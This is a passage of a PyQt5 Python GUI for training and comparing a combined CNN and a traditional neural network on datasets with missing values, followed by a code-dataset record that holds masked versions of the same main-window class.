self.mcbcnn = myCombineCNN.myCombineCNN(None, self.combineNumConv, self.convCoreNum, self.combineNumPooling)
succeed = self.mcbcnn.setModel(fname)
if succeed:
modelName = fname.split('/')[-1].split('.')[0]
self.presentModelName.setText(modelName)
reply = QMessageBox.information(self, '设置结果', '模型设置成功',
QMessageBox.Yes, QMessageBox.Yes)
else:
reply = QMessageBox.information(self, '设置结果', '模型设置失败',
QMessageBox.Yes, QMessageBox.Yes)
else:
reply = QMessageBox.information(self, '设置结果', '模型设置失败',
QMessageBox.Yes, QMessageBox.Yes)
elif self.sender() is self.loadModelButtonT:
fname, ok = QFileDialog.getOpenFileName(self, 'Load Model', '..',
'Traditional NN json files (*.trann.json)')
if ok:
if self.trann is None:
self.trann = traditionalNN.traditionalNN(None)
succeed = self.trann.setModel(fname)
if succeed:
modelName = fname.split('/')[-1].split('.')[0]
self.presentModelNameT.setText(modelName)
reply = QMessageBox.information(self, '设置结果', '模型设置成功',
QMessageBox.Yes, QMessageBox.Yes)
else:
reply = QMessageBox.information(self, '设置结果', '模型设置失败',
QMessageBox.Yes, QMessageBox.Yes)
else:
reply = QMessageBox.information(self, '设置结果', '模型设置失败',
QMessageBox.Yes, QMessageBox.Yes)
return
def showResult(self):
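        # refuse to open the result view while the corresponding model is still training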
if self.sender() is self.showResultButton:
if self.traingWidgetOnFlag['New']:
reply = QMessageBox.information(self, '提示', '训练正在进行',
QMessageBox.Yes, QMessageBox.Yes)
return
self.showResultW = showResultWidget.ShowResultWidget('combine-CNN预测结果展示', self, 'New')
elif self.sender() is self.showResultButtonT:
if self.traingWidgetOnFlag['Tra']:
reply = QMessageBox.information(self, '提示', '训练正在进行',
QMessageBox.Yes, QMessageBox.Yes)
return
self.showResultW = showResultWidget.ShowResultWidget('traditional NN预测结果展示', self, 'Tra')
return
def showJudge(self):
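        # let the user pick which data split the judgement is based on before opening the evaluation view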
if self.sender() is self.judgeResultButton:
if self.traingWidgetOnFlag['New']:
reply = QMessageBox.information(self, '提示', '训练正在进行',
QMessageBox.Yes, QMessageBox.Yes)
return
self.chooseJDWin = chooseJudgeDataSetWidget.chooseJudgeDataSetWidget('Choose Judgement-based-on Data Set',
self, 'New')
elif self.sender() is self.judgeResultButtonT:
if self.traingWidgetOnFlag['Tra']:
reply = QMessageBox.information(self, '提示', '训练正在进行',
QMessageBox.Yes, QMessageBox.Yes)
return
self.chooseJDWin = chooseJudgeDataSetWidget.chooseJudgeDataSetWidget('Choose Judgement-based-on Data Set',
self, 'Tra')
# self.testw = showJudgeWidgets.judgeWidget('test', self, 'New', 'Train')
# self.mcbcnn.runCNN('Test', self.dataFor['New'])
# drawCM = Judgement.myJudge(self.mcbcnn.data.yClassDic, self.mcbcnn.getAccuratePredictResult().argmax(1), self.mcbcnn.data.DataTestY.argmax(1))
# drawCM.plotConfuseMatrix()
if __name__ == '__main__':
app = QApplication(sys.argv)
myMainWindow = MyMainWindow()
sys.exit(app.exec_())
|
normal
|
{
"blob_id": "302605d8bb45b1529742bf9441d476f0276085b9",
"index": 9,
"step-1": "<mask token>\n\n\nclass MyMainWindow(QMainWindow):\n <mask token>\n <mask token>\n\n def initConnect(self):\n self.dataFileChooseButton.clicked.connect(self.chooseData)\n self.dataFileChooseButtonT.clicked.connect(self.chooseData)\n self.dataLossSimulateSettingButton.clicked.connect(self.\n setLossParameter)\n self.dataLossSimulateSettingButtonT.clicked.connect(self.\n setLossParameter)\n self.dataShowButton.clicked.connect(self.showData)\n self.dataShowButtonT.clicked.connect(self.showData)\n self.dataPreProcessButtonT.clicked.connect(self.preProcess)\n self.setModelParametersButton.clicked.connect(self.setModelParameters)\n self.setModelParametersButtonT.clicked.connect(self.setModelParameters)\n self.trainingButton.clicked.connect(self.training)\n self.trainingButtonT.clicked.connect(self.training)\n self.saveModelButton.clicked.connect(self.saveModel)\n self.saveModelButtonT.clicked.connect(self.saveModel)\n self.loadModelButton.clicked.connect(self.loadModel)\n self.loadModelButtonT.clicked.connect(self.loadModel)\n self.showResultButton.clicked.connect(self.showResult)\n self.showResultButtonT.clicked.connect(self.showResult)\n self.judgeResultButton.clicked.connect(self.showJudge)\n self.judgeResultButtonT.clicked.connect(self.showJudge)\n\n def chooseData(self):\n if self.sender() is self.dataFileChooseButton:\n self.fname['New'], ok = QFileDialog.getOpenFileName(self,\n 'Open file', '..', 'Text files (*.txt)')\n if ok:\n self.loadData()\n elif self.sender() is self.dataFileChooseButtonT:\n self.fname['Tra'], ok = QFileDialog.getOpenFileName(self,\n 'Open file', '..', 'Text files (*.txt)')\n if ok:\n self.loadData()\n return\n\n def loadData(self):\n if self.sender() is self.dataFileChooseButton:\n try:\n self.dataFor['New'] = myLoadData.loadData(self.fname['New'],\n self.dataLossRate['New'], self.dataSetLossValue['New'])\n except FileNotFoundError as e:\n reply = QMessageBox.information(self, 'Message',\n 'Data file not exist', QMessageBox.Yes, QMessageBox.Yes)\n return\n except Exception:\n reply = QMessageBox.information(self, 'Message',\n 'Data file format error', QMessageBox.Yes, QMessageBox.Yes)\n return\n dataname = self.fname['New'].split('/')[-1].split('.')[0]\n self.presentDataName.setText(dataname)\n self.presentDataName.resize(self.presentDataName.sizeHint())\n elif self.sender() is self.dataFileChooseButtonT:\n try:\n self.dataFor['Tra'] = myLoadData.loadData(self.fname['Tra'],\n self.dataLossRate['Tra'], self.dataSetLossValue['Tra'])\n except FileNotFoundError as e:\n reply = QMessageBox.information(self, 'Message',\n 'Data file not exist', QMessageBox.Yes, QMessageBox.Yes)\n return\n except Exception:\n reply = QMessageBox.information(self, 'Message',\n 'Data file format error', QMessageBox.Yes, QMessageBox.Yes)\n return\n dataname = self.fname['Tra'].split('/')[-1].split('.')[0]\n self.presentDataNameT.setText(dataname)\n self.presentDataNameT.resize(self.presentDataNameT.sizeHint())\n return\n\n def setLossParameter(self):\n if self.sender() is self.dataLossSimulateSettingButton:\n self.setLPDialog = setLossParameterDialog.setLossParameterDialog(\n 'combine-CNN设置缺失参数', self, 'New')\n elif self.sender() is self.dataLossSimulateSettingButtonT:\n self.setLPDialog = setLossParameterDialog.setLossParameterDialog(\n 'traditional NN设置缺失参数', self, 'Tra')\n return\n <mask token>\n\n def preProcess(self):\n if self.dataFor['Tra'] is None:\n reply = QMessageBox.information(self, '数据错误', '没有加载数据,无法预处理',\n QMessageBox.Yes, QMessageBox.Yes)\n else:\n 
self.dataFor['Tra'].MeanPreProcess()\n reply = QMessageBox.information(self, 'Message',\n 'PreProcess succeed!', QMessageBox.Yes, QMessageBox.Yes)\n return\n <mask token>\n <mask token>\n\n def saveModel(self):\n if self.sender() is self.saveModelButton:\n if self.mcbcnn is None:\n reply = QMessageBox.information(self, '模型错误', '模型不存在',\n QMessageBox.Yes, QMessageBox.Yes)\n return\n else:\n fname, ok = QFileDialog.getSaveFileName(self, 'Save Model',\n '..\\\\myCombineCNN.cbcnn.json',\n 'Combine-CNN json files (*.cbcnn.json)')\n if ok:\n succeed = self.mcbcnn.saveModel(fname)\n if succeed:\n reply = QMessageBox.information(self, '保存结果',\n '模型保存成功', QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '保存结果',\n '模型保存失败', QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '保存结果', '模型保存失败',\n QMessageBox.Yes, QMessageBox.Yes)\n elif self.sender() is self.saveModelButtonT:\n if self.trann is None:\n reply = QMessageBox.information(self, '模型错误', '模型不存在',\n QMessageBox.Yes, QMessageBox.Yes)\n return\n else:\n fname, ok = QFileDialog.getSaveFileName(self, 'Save Model',\n '..\\\\traditionalNN.trann.json',\n 'Traditional NN json files (*.trann.json)')\n if ok:\n succeed = self.trann.saveModel(fname)\n if succeed:\n reply = QMessageBox.information(self, '保存结果',\n '模型保存成功', QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '保存结果',\n '模型保存失败', QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '保存结果', '模型保存失败',\n QMessageBox.Yes, QMessageBox.Yes)\n <mask token>\n\n def showResult(self):\n if self.sender() is self.showResultButton:\n if self.traingWidgetOnFlag['New']:\n reply = QMessageBox.information(self, '提示', '训练正在进行',\n QMessageBox.Yes, QMessageBox.Yes)\n return\n self.showResultW = showResultWidget.ShowResultWidget(\n 'combine-CNN预测结果展示', self, 'New')\n elif self.sender() is self.showResultButtonT:\n if self.traingWidgetOnFlag['Tra']:\n reply = QMessageBox.information(self, '提示', '训练正在进行',\n QMessageBox.Yes, QMessageBox.Yes)\n return\n self.showResultW = showResultWidget.ShowResultWidget(\n 'traditional NN预测结果展示', self, 'Tra')\n return\n\n def showJudge(self):\n if self.sender() is self.judgeResultButton:\n if self.traingWidgetOnFlag['New']:\n reply = QMessageBox.information(self, '提示', '训练正在进行',\n QMessageBox.Yes, QMessageBox.Yes)\n return\n self.chooseJDWin = (chooseJudgeDataSetWidget.\n chooseJudgeDataSetWidget(\n 'Choose Judgement-based-on Data Set', self, 'New'))\n elif self.sender() is self.judgeResultButtonT:\n if self.traingWidgetOnFlag['Tra']:\n reply = QMessageBox.information(self, '提示', '训练正在进行',\n QMessageBox.Yes, QMessageBox.Yes)\n return\n self.chooseJDWin = (chooseJudgeDataSetWidget.\n chooseJudgeDataSetWidget(\n 'Choose Judgement-based-on Data Set', self, 'Tra'))\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass MyMainWindow(QMainWindow):\n <mask token>\n\n def initUI(self):\n self.statusBar().showMessage('Ready')\n dataModule = QVBoxLayout()\n self.dataFileChooseButton = QPushButton('选择数据')\n self.dataFileChooseButton.setFont(QFont('微软雅黑', 16))\n self.dataLossSimulateSettingButton = QPushButton('设置数据缺失参数')\n self.dataLossSimulateSettingButton.setFont(QFont('微软雅黑', 16))\n self.dataShowButton = QPushButton('展示数据')\n self.dataShowButton.setFont(QFont('微软雅黑', 16))\n label = QLabel('Present Data:')\n label.setFont(QFont('微软雅黑', 16))\n self.presentDataName = QLabel('None')\n self.presentDataName.setFont(QFont('微软雅黑', 16))\n labelbox = QVBoxLayout()\n labelbox.addWidget(label)\n labelbox.addWidget(self.presentDataName)\n dataModule.addStretch(1)\n dataModule.addLayout(labelbox)\n dataModule.addStretch(1)\n dataModule.addWidget(self.dataFileChooseButton)\n dataModule.addStretch(1)\n dataModule.addWidget(self.dataLossSimulateSettingButton)\n dataModule.addStretch(1)\n dataModule.addWidget(self.dataShowButton)\n dataModule.addStretch(1)\n trainingModule = QVBoxLayout()\n self.setModelParametersButton = QPushButton('Model Parameters')\n self.setModelParametersButton.setFont(QFont('微软雅黑', 16))\n self.trainingButton = QPushButton('Training')\n self.trainingButton.setFont(QFont('微软雅黑', 16))\n self.saveModelButton = QPushButton('Save Model')\n self.saveModelButton.setFont(QFont('微软雅黑', 16))\n self.loadModelButton = QPushButton('Load Model')\n self.loadModelButton.setFont(QFont('微软雅黑', 16))\n label = QLabel('Present Model:')\n label.setFont(QFont('微软雅黑', 16))\n self.presentModelName = QLabel('None')\n self.presentModelName.setFont(QFont('微软雅黑', 16))\n labelbox = QVBoxLayout()\n labelbox.addWidget(label)\n labelbox.addWidget(self.presentModelName)\n trainingModule.addStretch(1)\n trainingModule.addLayout(labelbox)\n trainingModule.addStretch(1)\n trainingModule.addWidget(self.setModelParametersButton)\n trainingModule.addStretch(1)\n trainingModule.addWidget(self.trainingButton)\n trainingModule.addStretch(1)\n trainingModule.addWidget(self.saveModelButton)\n trainingModule.addStretch(1)\n trainingModule.addWidget(self.loadModelButton)\n trainingModule.addStretch(1)\n resultShowModule = QVBoxLayout()\n self.showResultButton = QPushButton('分类结果展示')\n self.showResultButton.setFont(QFont('微软雅黑', 16))\n self.judgeResultButton = QPushButton('分类结果评估')\n self.judgeResultButton.setFont(QFont('微软雅黑', 16))\n resultShowModule.addWidget(self.showResultButton)\n resultShowModule.addWidget(self.judgeResultButton)\n hboxTop = QHBoxLayout()\n hboxTop.addStretch(1)\n mcnnLabel = QLabel('Combine-CNN:')\n mcnnLabel.setFont(QFont('微软雅黑', 24, QFont.Bold))\n hboxTop.addWidget(mcnnLabel)\n hboxTop.addStretch(1)\n hboxTop.addLayout(dataModule)\n hboxTop.addStretch(1)\n hboxTop.addLayout(trainingModule)\n hboxTop.addStretch(1)\n hboxTop.addLayout(resultShowModule)\n hboxTop.addStretch(1)\n dataModuleT = QVBoxLayout()\n self.dataFileChooseButtonT = QPushButton('选择数据')\n self.dataFileChooseButtonT.setFont(QFont('微软雅黑', 16))\n self.dataLossSimulateSettingButtonT = QPushButton('设置数据缺失参数')\n self.dataLossSimulateSettingButtonT.setFont(QFont('微软雅黑', 16))\n self.dataPreProcessButtonT = QPushButton('数据预处理')\n self.dataPreProcessButtonT.setFont(QFont('微软雅黑', 16))\n self.dataShowButtonT = QPushButton('展示数据')\n self.dataShowButtonT.setFont(QFont('微软雅黑', 16))\n label = QLabel('Present Data:')\n label.setFont(QFont('微软雅黑', 16))\n self.presentDataNameT = QLabel('None')\n self.presentDataNameT.setFont(QFont('微软雅黑', 
16))\n labelbox = QVBoxLayout()\n labelbox.addWidget(label)\n labelbox.addWidget(self.presentDataNameT)\n dataModuleT.addStretch(1)\n dataModuleT.addLayout(labelbox)\n dataModuleT.addStretch(1)\n dataModuleT.addWidget(self.dataFileChooseButtonT)\n dataModuleT.addStretch(1)\n dataModuleT.addWidget(self.dataLossSimulateSettingButtonT)\n dataModuleT.addStretch(1)\n dataModuleT.addWidget(self.dataPreProcessButtonT)\n dataModuleT.addStretch(1)\n dataModuleT.addWidget(self.dataShowButtonT)\n dataModuleT.addStretch(1)\n trainingModuleT = QVBoxLayout()\n self.setModelParametersButtonT = QPushButton('Model Parameters')\n self.setModelParametersButtonT.setFont(QFont('微软雅黑', 16))\n self.trainingButtonT = QPushButton('Training')\n self.trainingButtonT.setFont(QFont('微软雅黑', 16))\n self.saveModelButtonT = QPushButton('Save Model')\n self.saveModelButtonT.setFont(QFont('微软雅黑', 16))\n self.loadModelButtonT = QPushButton('Load Model')\n self.loadModelButtonT.setFont(QFont('微软雅黑', 16))\n label = QLabel('Present Model:')\n label.setFont(QFont('微软雅黑', 16))\n self.presentModelNameT = QLabel('None')\n self.presentModelNameT.setFont(QFont('微软雅黑', 16))\n labelbox = QVBoxLayout()\n labelbox.addWidget(label)\n labelbox.addWidget(self.presentModelNameT)\n trainingModuleT.addStretch(1)\n trainingModuleT.addLayout(labelbox)\n trainingModuleT.addStretch(1)\n trainingModuleT.addWidget(self.setModelParametersButtonT)\n trainingModuleT.addStretch(1)\n trainingModuleT.addWidget(self.trainingButtonT)\n trainingModuleT.addStretch(1)\n trainingModuleT.addWidget(self.saveModelButtonT)\n trainingModuleT.addStretch(1)\n trainingModuleT.addWidget(self.loadModelButtonT)\n trainingModuleT.addStretch(1)\n resultShowModuleT = QVBoxLayout()\n self.showResultButtonT = QPushButton('分类结果展示')\n self.showResultButtonT.setFont(QFont('微软雅黑', 16))\n self.judgeResultButtonT = QPushButton('分类结果评估')\n self.judgeResultButtonT.setFont(QFont('微软雅黑', 16))\n resultShowModuleT.addWidget(self.showResultButtonT)\n resultShowModuleT.addWidget(self.judgeResultButtonT)\n hboxBottom = QHBoxLayout(self)\n hboxBottom.addStretch(1)\n traditionNNLabel = QLabel('Traditional NN:')\n traditionNNLabel.setFont(QFont('微软雅黑', 24, QFont.Bold))\n hboxBottom.addWidget(traditionNNLabel)\n hboxBottom.addStretch(1)\n hboxBottom.addLayout(dataModuleT)\n hboxBottom.addStretch(1)\n hboxBottom.addLayout(trainingModuleT)\n hboxBottom.addStretch(1)\n hboxBottom.addLayout(resultShowModuleT)\n hboxBottom.addStretch(1)\n splitterLine = QLabel(self)\n splitterLine.setFont(QFont('Times', 1))\n col = QColor(0, 0, 0)\n splitterLine.setStyleSheet('QWidget { background-color: %s }' % col\n .name())\n splitterLine.resize(splitterLine.sizeHint())\n vbox = QVBoxLayout()\n vbox.addLayout(hboxTop)\n vbox.addWidget(splitterLine)\n vbox.addLayout(hboxBottom)\n mainWidget = QWidget()\n mainWidget.setLayout(vbox)\n self.setCentralWidget(mainWidget)\n self.setGeometry(350, 100, self.windowLength, self.windowHigh)\n self.setWindowTitle('适用于有缺失值数据集的神经网络系统')\n self.show()\n\n def initConnect(self):\n self.dataFileChooseButton.clicked.connect(self.chooseData)\n self.dataFileChooseButtonT.clicked.connect(self.chooseData)\n self.dataLossSimulateSettingButton.clicked.connect(self.\n setLossParameter)\n self.dataLossSimulateSettingButtonT.clicked.connect(self.\n setLossParameter)\n self.dataShowButton.clicked.connect(self.showData)\n self.dataShowButtonT.clicked.connect(self.showData)\n self.dataPreProcessButtonT.clicked.connect(self.preProcess)\n 
self.setModelParametersButton.clicked.connect(self.setModelParameters)\n self.setModelParametersButtonT.clicked.connect(self.setModelParameters)\n self.trainingButton.clicked.connect(self.training)\n self.trainingButtonT.clicked.connect(self.training)\n self.saveModelButton.clicked.connect(self.saveModel)\n self.saveModelButtonT.clicked.connect(self.saveModel)\n self.loadModelButton.clicked.connect(self.loadModel)\n self.loadModelButtonT.clicked.connect(self.loadModel)\n self.showResultButton.clicked.connect(self.showResult)\n self.showResultButtonT.clicked.connect(self.showResult)\n self.judgeResultButton.clicked.connect(self.showJudge)\n self.judgeResultButtonT.clicked.connect(self.showJudge)\n\n def chooseData(self):\n if self.sender() is self.dataFileChooseButton:\n self.fname['New'], ok = QFileDialog.getOpenFileName(self,\n 'Open file', '..', 'Text files (*.txt)')\n if ok:\n self.loadData()\n elif self.sender() is self.dataFileChooseButtonT:\n self.fname['Tra'], ok = QFileDialog.getOpenFileName(self,\n 'Open file', '..', 'Text files (*.txt)')\n if ok:\n self.loadData()\n return\n\n def loadData(self):\n if self.sender() is self.dataFileChooseButton:\n try:\n self.dataFor['New'] = myLoadData.loadData(self.fname['New'],\n self.dataLossRate['New'], self.dataSetLossValue['New'])\n except FileNotFoundError as e:\n reply = QMessageBox.information(self, 'Message',\n 'Data file not exist', QMessageBox.Yes, QMessageBox.Yes)\n return\n except Exception:\n reply = QMessageBox.information(self, 'Message',\n 'Data file format error', QMessageBox.Yes, QMessageBox.Yes)\n return\n dataname = self.fname['New'].split('/')[-1].split('.')[0]\n self.presentDataName.setText(dataname)\n self.presentDataName.resize(self.presentDataName.sizeHint())\n elif self.sender() is self.dataFileChooseButtonT:\n try:\n self.dataFor['Tra'] = myLoadData.loadData(self.fname['Tra'],\n self.dataLossRate['Tra'], self.dataSetLossValue['Tra'])\n except FileNotFoundError as e:\n reply = QMessageBox.information(self, 'Message',\n 'Data file not exist', QMessageBox.Yes, QMessageBox.Yes)\n return\n except Exception:\n reply = QMessageBox.information(self, 'Message',\n 'Data file format error', QMessageBox.Yes, QMessageBox.Yes)\n return\n dataname = self.fname['Tra'].split('/')[-1].split('.')[0]\n self.presentDataNameT.setText(dataname)\n self.presentDataNameT.resize(self.presentDataNameT.sizeHint())\n return\n\n def setLossParameter(self):\n if self.sender() is self.dataLossSimulateSettingButton:\n self.setLPDialog = setLossParameterDialog.setLossParameterDialog(\n 'combine-CNN设置缺失参数', self, 'New')\n elif self.sender() is self.dataLossSimulateSettingButtonT:\n self.setLPDialog = setLossParameterDialog.setLossParameterDialog(\n 'traditional NN设置缺失参数', self, 'Tra')\n return\n\n def showData(self):\n if self.sender() is self.dataShowButton:\n self.showDataW = showDataWidget.ShowDataWidget('combine-CNN数据展示',\n self, 'New')\n elif self.sender() is self.dataShowButtonT:\n self.showDataW = showDataWidget.ShowDataWidget('traditional NN数据展示'\n , self, 'Tra')\n return\n\n def preProcess(self):\n if self.dataFor['Tra'] is None:\n reply = QMessageBox.information(self, '数据错误', '没有加载数据,无法预处理',\n QMessageBox.Yes, QMessageBox.Yes)\n else:\n self.dataFor['Tra'].MeanPreProcess()\n reply = QMessageBox.information(self, 'Message',\n 'PreProcess succeed!', QMessageBox.Yes, QMessageBox.Yes)\n return\n <mask token>\n <mask token>\n\n def saveModel(self):\n if self.sender() is self.saveModelButton:\n if self.mcbcnn is None:\n reply = 
QMessageBox.information(self, '模型错误', '模型不存在',\n QMessageBox.Yes, QMessageBox.Yes)\n return\n else:\n fname, ok = QFileDialog.getSaveFileName(self, 'Save Model',\n '..\\\\myCombineCNN.cbcnn.json',\n 'Combine-CNN json files (*.cbcnn.json)')\n if ok:\n succeed = self.mcbcnn.saveModel(fname)\n if succeed:\n reply = QMessageBox.information(self, '保存结果',\n '模型保存成功', QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '保存结果',\n '模型保存失败', QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '保存结果', '模型保存失败',\n QMessageBox.Yes, QMessageBox.Yes)\n elif self.sender() is self.saveModelButtonT:\n if self.trann is None:\n reply = QMessageBox.information(self, '模型错误', '模型不存在',\n QMessageBox.Yes, QMessageBox.Yes)\n return\n else:\n fname, ok = QFileDialog.getSaveFileName(self, 'Save Model',\n '..\\\\traditionalNN.trann.json',\n 'Traditional NN json files (*.trann.json)')\n if ok:\n succeed = self.trann.saveModel(fname)\n if succeed:\n reply = QMessageBox.information(self, '保存结果',\n '模型保存成功', QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '保存结果',\n '模型保存失败', QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '保存结果', '模型保存失败',\n QMessageBox.Yes, QMessageBox.Yes)\n <mask token>\n\n def showResult(self):\n if self.sender() is self.showResultButton:\n if self.traingWidgetOnFlag['New']:\n reply = QMessageBox.information(self, '提示', '训练正在进行',\n QMessageBox.Yes, QMessageBox.Yes)\n return\n self.showResultW = showResultWidget.ShowResultWidget(\n 'combine-CNN预测结果展示', self, 'New')\n elif self.sender() is self.showResultButtonT:\n if self.traingWidgetOnFlag['Tra']:\n reply = QMessageBox.information(self, '提示', '训练正在进行',\n QMessageBox.Yes, QMessageBox.Yes)\n return\n self.showResultW = showResultWidget.ShowResultWidget(\n 'traditional NN预测结果展示', self, 'Tra')\n return\n\n def showJudge(self):\n if self.sender() is self.judgeResultButton:\n if self.traingWidgetOnFlag['New']:\n reply = QMessageBox.information(self, '提示', '训练正在进行',\n QMessageBox.Yes, QMessageBox.Yes)\n return\n self.chooseJDWin = (chooseJudgeDataSetWidget.\n chooseJudgeDataSetWidget(\n 'Choose Judgement-based-on Data Set', self, 'New'))\n elif self.sender() is self.judgeResultButtonT:\n if self.traingWidgetOnFlag['Tra']:\n reply = QMessageBox.information(self, '提示', '训练正在进行',\n QMessageBox.Yes, QMessageBox.Yes)\n return\n self.chooseJDWin = (chooseJudgeDataSetWidget.\n chooseJudgeDataSetWidget(\n 'Choose Judgement-based-on Data Set', self, 'Tra'))\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass MyMainWindow(QMainWindow):\n <mask token>\n\n def initUI(self):\n self.statusBar().showMessage('Ready')\n dataModule = QVBoxLayout()\n self.dataFileChooseButton = QPushButton('选择数据')\n self.dataFileChooseButton.setFont(QFont('微软雅黑', 16))\n self.dataLossSimulateSettingButton = QPushButton('设置数据缺失参数')\n self.dataLossSimulateSettingButton.setFont(QFont('微软雅黑', 16))\n self.dataShowButton = QPushButton('展示数据')\n self.dataShowButton.setFont(QFont('微软雅黑', 16))\n label = QLabel('Present Data:')\n label.setFont(QFont('微软雅黑', 16))\n self.presentDataName = QLabel('None')\n self.presentDataName.setFont(QFont('微软雅黑', 16))\n labelbox = QVBoxLayout()\n labelbox.addWidget(label)\n labelbox.addWidget(self.presentDataName)\n dataModule.addStretch(1)\n dataModule.addLayout(labelbox)\n dataModule.addStretch(1)\n dataModule.addWidget(self.dataFileChooseButton)\n dataModule.addStretch(1)\n dataModule.addWidget(self.dataLossSimulateSettingButton)\n dataModule.addStretch(1)\n dataModule.addWidget(self.dataShowButton)\n dataModule.addStretch(1)\n trainingModule = QVBoxLayout()\n self.setModelParametersButton = QPushButton('Model Parameters')\n self.setModelParametersButton.setFont(QFont('微软雅黑', 16))\n self.trainingButton = QPushButton('Training')\n self.trainingButton.setFont(QFont('微软雅黑', 16))\n self.saveModelButton = QPushButton('Save Model')\n self.saveModelButton.setFont(QFont('微软雅黑', 16))\n self.loadModelButton = QPushButton('Load Model')\n self.loadModelButton.setFont(QFont('微软雅黑', 16))\n label = QLabel('Present Model:')\n label.setFont(QFont('微软雅黑', 16))\n self.presentModelName = QLabel('None')\n self.presentModelName.setFont(QFont('微软雅黑', 16))\n labelbox = QVBoxLayout()\n labelbox.addWidget(label)\n labelbox.addWidget(self.presentModelName)\n trainingModule.addStretch(1)\n trainingModule.addLayout(labelbox)\n trainingModule.addStretch(1)\n trainingModule.addWidget(self.setModelParametersButton)\n trainingModule.addStretch(1)\n trainingModule.addWidget(self.trainingButton)\n trainingModule.addStretch(1)\n trainingModule.addWidget(self.saveModelButton)\n trainingModule.addStretch(1)\n trainingModule.addWidget(self.loadModelButton)\n trainingModule.addStretch(1)\n resultShowModule = QVBoxLayout()\n self.showResultButton = QPushButton('分类结果展示')\n self.showResultButton.setFont(QFont('微软雅黑', 16))\n self.judgeResultButton = QPushButton('分类结果评估')\n self.judgeResultButton.setFont(QFont('微软雅黑', 16))\n resultShowModule.addWidget(self.showResultButton)\n resultShowModule.addWidget(self.judgeResultButton)\n hboxTop = QHBoxLayout()\n hboxTop.addStretch(1)\n mcnnLabel = QLabel('Combine-CNN:')\n mcnnLabel.setFont(QFont('微软雅黑', 24, QFont.Bold))\n hboxTop.addWidget(mcnnLabel)\n hboxTop.addStretch(1)\n hboxTop.addLayout(dataModule)\n hboxTop.addStretch(1)\n hboxTop.addLayout(trainingModule)\n hboxTop.addStretch(1)\n hboxTop.addLayout(resultShowModule)\n hboxTop.addStretch(1)\n dataModuleT = QVBoxLayout()\n self.dataFileChooseButtonT = QPushButton('选择数据')\n self.dataFileChooseButtonT.setFont(QFont('微软雅黑', 16))\n self.dataLossSimulateSettingButtonT = QPushButton('设置数据缺失参数')\n self.dataLossSimulateSettingButtonT.setFont(QFont('微软雅黑', 16))\n self.dataPreProcessButtonT = QPushButton('数据预处理')\n self.dataPreProcessButtonT.setFont(QFont('微软雅黑', 16))\n self.dataShowButtonT = QPushButton('展示数据')\n self.dataShowButtonT.setFont(QFont('微软雅黑', 16))\n label = QLabel('Present Data:')\n label.setFont(QFont('微软雅黑', 16))\n self.presentDataNameT = QLabel('None')\n self.presentDataNameT.setFont(QFont('微软雅黑', 
16))\n labelbox = QVBoxLayout()\n labelbox.addWidget(label)\n labelbox.addWidget(self.presentDataNameT)\n dataModuleT.addStretch(1)\n dataModuleT.addLayout(labelbox)\n dataModuleT.addStretch(1)\n dataModuleT.addWidget(self.dataFileChooseButtonT)\n dataModuleT.addStretch(1)\n dataModuleT.addWidget(self.dataLossSimulateSettingButtonT)\n dataModuleT.addStretch(1)\n dataModuleT.addWidget(self.dataPreProcessButtonT)\n dataModuleT.addStretch(1)\n dataModuleT.addWidget(self.dataShowButtonT)\n dataModuleT.addStretch(1)\n trainingModuleT = QVBoxLayout()\n self.setModelParametersButtonT = QPushButton('Model Parameters')\n self.setModelParametersButtonT.setFont(QFont('微软雅黑', 16))\n self.trainingButtonT = QPushButton('Training')\n self.trainingButtonT.setFont(QFont('微软雅黑', 16))\n self.saveModelButtonT = QPushButton('Save Model')\n self.saveModelButtonT.setFont(QFont('微软雅黑', 16))\n self.loadModelButtonT = QPushButton('Load Model')\n self.loadModelButtonT.setFont(QFont('微软雅黑', 16))\n label = QLabel('Present Model:')\n label.setFont(QFont('微软雅黑', 16))\n self.presentModelNameT = QLabel('None')\n self.presentModelNameT.setFont(QFont('微软雅黑', 16))\n labelbox = QVBoxLayout()\n labelbox.addWidget(label)\n labelbox.addWidget(self.presentModelNameT)\n trainingModuleT.addStretch(1)\n trainingModuleT.addLayout(labelbox)\n trainingModuleT.addStretch(1)\n trainingModuleT.addWidget(self.setModelParametersButtonT)\n trainingModuleT.addStretch(1)\n trainingModuleT.addWidget(self.trainingButtonT)\n trainingModuleT.addStretch(1)\n trainingModuleT.addWidget(self.saveModelButtonT)\n trainingModuleT.addStretch(1)\n trainingModuleT.addWidget(self.loadModelButtonT)\n trainingModuleT.addStretch(1)\n resultShowModuleT = QVBoxLayout()\n self.showResultButtonT = QPushButton('分类结果展示')\n self.showResultButtonT.setFont(QFont('微软雅黑', 16))\n self.judgeResultButtonT = QPushButton('分类结果评估')\n self.judgeResultButtonT.setFont(QFont('微软雅黑', 16))\n resultShowModuleT.addWidget(self.showResultButtonT)\n resultShowModuleT.addWidget(self.judgeResultButtonT)\n hboxBottom = QHBoxLayout(self)\n hboxBottom.addStretch(1)\n traditionNNLabel = QLabel('Traditional NN:')\n traditionNNLabel.setFont(QFont('微软雅黑', 24, QFont.Bold))\n hboxBottom.addWidget(traditionNNLabel)\n hboxBottom.addStretch(1)\n hboxBottom.addLayout(dataModuleT)\n hboxBottom.addStretch(1)\n hboxBottom.addLayout(trainingModuleT)\n hboxBottom.addStretch(1)\n hboxBottom.addLayout(resultShowModuleT)\n hboxBottom.addStretch(1)\n splitterLine = QLabel(self)\n splitterLine.setFont(QFont('Times', 1))\n col = QColor(0, 0, 0)\n splitterLine.setStyleSheet('QWidget { background-color: %s }' % col\n .name())\n splitterLine.resize(splitterLine.sizeHint())\n vbox = QVBoxLayout()\n vbox.addLayout(hboxTop)\n vbox.addWidget(splitterLine)\n vbox.addLayout(hboxBottom)\n mainWidget = QWidget()\n mainWidget.setLayout(vbox)\n self.setCentralWidget(mainWidget)\n self.setGeometry(350, 100, self.windowLength, self.windowHigh)\n self.setWindowTitle('适用于有缺失值数据集的神经网络系统')\n 